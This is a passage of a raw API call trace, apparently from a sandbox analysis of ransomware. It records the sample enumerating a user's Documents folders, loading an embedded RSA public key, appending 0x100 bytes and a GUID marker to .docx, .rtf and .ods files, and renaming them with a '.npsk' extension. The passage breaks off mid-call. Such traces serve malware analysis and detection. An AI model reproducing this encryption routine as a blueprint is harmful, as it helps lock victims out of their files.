hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x177e6, lpOverlapped=0x0) returned 1 [0216.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.959] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.960] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.960] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.960] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.960] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.960] GetLastError () returned 0x0 [0216.960] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.961] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.961] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.961] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.961] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.961] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.962] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x177e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.962] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.963] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.963] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.963] CloseHandle (hObject=0x61c) returned 1 [0216.966] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\sURFXqqJWYX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\surfxqqjwyx.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\sURFXqqJWYX.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\surfxqqjwyx.docx.npsk")) returned 1 [0216.968] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc4f450, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x2e6fd9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x2e6fd9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0x177e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sURFXqqJWYX.docx", cAlternateFileName="SURFXQ~1.DOC")) returned 0 [0216.968] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.968] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.968] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\") returned="lMexzd9nHZj622T267Je\\" [0216.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\") returned="y5VbixHYeFSBUXkYrU1j\\" [0216.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.968] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.968] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.969] PathFindFileNameW (pszPath="") returned="" [0216.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e6a9ed0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1ac016d0, ftLastAccessTime.dwHighDateTime=0x1d5de1a, ftLastWriteTime.dwLowDateTime=0x1ac016d0, ftLastWriteTime.dwHighDateTime=0x1d5de1a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.972] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e6a9ed0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1ac016d0, ftLastAccessTime.dwHighDateTime=0x1d5de1a, ftLastWriteTime.dwLowDateTime=0x1ac016d0, ftLastWriteTime.dwHighDateTime=0x1d5de1a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.972] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x215931f0, ftCreationTime.dwHighDateTime=0x1d5db83, ftLastAccessTime.dwLowDateTime=0xeb87000, ftLastAccessTime.dwHighDateTime=0x1d5dfe9, ftLastWriteTime.dwLowDateTime=0xeb87000, ftLastWriteTime.dwHighDateTime=0x1d5dfe9, nFileSizeHigh=0x0, nFileSizeLow=0x8b26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ddXG18fD.rtf", cAlternateFileName="-DDXG1~1.RTF")) returned 1 [0216.972] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\-ddXG18fD.rtf") returned=".rtf" [0216.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\-ddXG18fD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\-ddxg18fd.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.975] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=35622) returned 1 [0216.975] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.977] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.977] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.979] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x8b26, lpOverlapped=0x0) returned 1 [0216.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.980] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.980] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.980] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.981] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.981] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.981] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.981] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.981] GetLastError () returned 0x0 [0216.981] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.981] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.981] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.981] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.981] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.981] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.982] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8b26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.982] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.982] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.982] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.983] CloseHandle (hObject=0x61c) returned 1 [0216.984] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\-ddXG18fD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\-ddxg18fd.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\-ddXG18fD.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\-ddxg18fd.rtf.npsk")) returned 1 [0216.986] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb4a3f00, ftCreationTime.dwHighDateTime=0x1d5dc78, ftLastAccessTime.dwLowDateTime=0x5b2e33f0, ftLastAccessTime.dwHighDateTime=0x1d5d7fd, ftLastWriteTime.dwLowDateTime=0x5b2e33f0, ftLastWriteTime.dwHighDateTime=0x1d5d7fd, nFileSizeHigh=0x0, nFileSizeLow=0x147c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cebs.rtf", cAlternateFileName="")) returned 1 [0216.986] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\cebs.rtf") returned=".rtf" [0216.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\cebs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\cebs.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.988] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=83907) returned 1 [0216.988] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.990] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1479d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.990] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x147c3, lpOverlapped=0x0) returned 1 [0216.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.993] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.994] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.994] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.994] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.994] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.994] GetLastError () returned 0x0 [0216.994] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.994] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.994] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.994] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.994] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.995] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.996] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x147c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.996] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.996] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.996] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.996] CloseHandle (hObject=0x61c) returned 1 [0216.998] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\cebs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\cebs.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\cebs.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\cebs.rtf.npsk")) returned 1 [0217.000] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e354b0, ftCreationTime.dwHighDateTime=0x1d5dfc0, ftLastAccessTime.dwLowDateTime=0x1148f450, ftLastAccessTime.dwHighDateTime=0x1d5e5db, ftLastWriteTime.dwLowDateTime=0x1148f450, ftLastWriteTime.dwHighDateTime=0x1d5e5db, nFileSizeHigh=0x0, nFileSizeLow=0x816a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F1zwWt-ztRzNNQA.ods", cAlternateFileName="F1ZWWT~1.ODS")) returned 1 [0217.000] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\F1zwWt-ztRzNNQA.ods") returned=".ods" [0217.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\F1zwWt-ztRzNNQA.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\f1zwwt-ztrznnqa.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.002] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=33130) returned 1 [0217.002] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.004] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8144, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.004] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.006] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x816a, lpOverlapped=0x0) returned 1 [0217.007] lstrlenA (lpString="-----BEGIN PUBLIC 